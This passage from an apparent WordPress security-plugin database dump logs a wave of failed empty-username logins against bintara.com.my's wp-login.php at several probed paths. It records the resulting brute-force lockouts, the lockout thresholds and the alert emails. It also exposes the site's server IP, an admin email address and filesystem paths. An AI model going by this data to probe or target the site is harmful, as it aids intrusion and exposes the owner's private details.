attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:15:13\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:15:13\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:30:13\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:30:13\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:15:14','2019-09-21 11:15:13',17882368,19289480,'https://bintara.com.my/2019/wp-login.php',1,0,'198.12.149.7'),(25525,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:15:14','2019-09-21 11:15:13',18089512,19289480,'https://bintara.com.my/2019/wp-login.php',1,0,'198.12.149.7'),(25526,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYGObfBTP0kPOVnb8jqAgAAAEM\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"52.64.168.0\";s:11:\"REMOTE_PORT\";s:5:\"48084\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYGObfBTP0kPOVnb8jqAgAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064509.3855\";s:12:\"REQUEST_TIME\";s:10:\"1569064509\";}}','notice','2019-09-21 11:15:14','2019-09-21 11:15:13',17796544,19287776,'https://bintara.com.my/wordpress/wp-login.php',1,0,'52.64.168.0'),(25527,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYGPnkXpgmG5P@iB8kTWgAAAJY\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"46.101.104.225\";s:11:\"REMOTE_PORT\";s:5:\"43150\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYGPnkXpgmG5P@iB8kTWgAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569064513.837\";s:12:\"REQUEST_TIME\";s:10:\"1569064513\";}}','notice','2019-09-21 11:15:15','2019-09-21 11:15:14',17797720,19288184,'https://bintara.com.my/blog/wp-login.php',1,0,'46.101.104.225'),(25528,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYGeHkXpgmG5P@iB8kTmgAAAIo\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"157.245.5.62\";s:11:\"REMOTE_PORT\";s:5:\"54896\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYGeHkXpgmG5P@iB8kTmgAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064569.7549\";s:12:\"REQUEST_TIME\";s:10:\"1569064569\";}}','notice','2019-09-21 11:16:11','2019-09-21 11:16:10',17799960,19289448,'https://bintara.com.my/test/wp-login.php',1,0,'157.245.5.62'),(25529,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:16:10\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:16:10\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:31:10\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:31:10\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:16:11','2019-09-21 11:16:10',17884552,19289448,'https://bintara.com.my/test/wp-login.php',1,0,'157.245.5.62'),(25530,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:16:11','2019-09-21 11:16:10',18090088,19289448,'https://bintara.com.my/test/wp-login.php',1,0,'157.245.5.62'),(25531,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYGgHkXpgmG5P@iB8kTpAAAAIM\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"107.189.2.90\";s:11:\"REMOTE_PORT\";s:5:\"58108\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYGgHkXpgmG5P@iB8kTpAAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064580.1723\";s:12:\"REQUEST_TIME\";s:10:\"1569064580\";}}','notice','2019-09-21 11:16:23','2019-09-21 11:16:22',17797472,19289480,'https://bintara.com.my/blog/wp-login.php',1,0,'107.189.2.90'),(25532,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:16:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:16:22\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:31:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:31:22\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:16:23','2019-09-21 11:16:22',17882368,19289480,'https://bintara.com.my/blog/wp-login.php',1,0,'107.189.2.90'),(25533,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:16:23','2019-09-21 11:16:22',18089512,19289480,'https://bintara.com.my/blog/wp-login.php',1,0,'107.189.2.90'),(25534,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYGt3kXpgmG5P@iB8kT7wAAAIc\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"198.1.66.35\";s:11:\"REMOTE_PORT\";s:5:\"38492\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYGt3kXpgmG5P@iB8kT7wAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064635.9545\";s:12:\"REQUEST_TIME\";s:10:\"1569064635\";}}','notice','2019-09-21 11:17:18','2019-09-21 11:17:17',17797384,19288528,'https://bintara.com.my/wp/wp-login.php',1,0,'198.1.66.35'),(25535,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:17:17\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:17:17\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:32:17\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:32:17\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:17:18','2019-09-21 11:17:17',17882336,19288528,'https://bintara.com.my/wp/wp-login.php',1,0,'198.1.66.35'),(25536,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:17:18','2019-09-21 11:17:17',18088000,19288528,'https://bintara.com.my/wp/wp-login.php',1,0,'198.1.66.35'),(25537,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYG1ViJ7D9Gn7wDPh8XJQAAAM8\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"46.45.143.35\";s:11:\"REMOTE_PORT\";s:5:\"60514\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYG1ViJ7D9Gn7wDPh8XJQAAAM8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064661.7944\";s:12:\"REQUEST_TIME\";s:10:\"1569064661\";}}','notice','2019-09-21 11:17:43','2019-09-21 11:17:42',17799856,19289488,'https://bintara.com.my/2019/wp-login.php',1,0,'46.45.143.35'),(25538,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:17:42\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:17:42\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:32:42\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:32:42\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:17:43','2019-09-21 11:17:42',17884560,19289488,'https://bintara.com.my/2019/wp-login.php',1,0,'46.45.143.35'),(25539,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:17:43','2019-09-21 11:17:42',18090208,19289488,'https://bintara.com.my/2019/wp-login.php',1,0,'46.45.143.35'),(25540,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 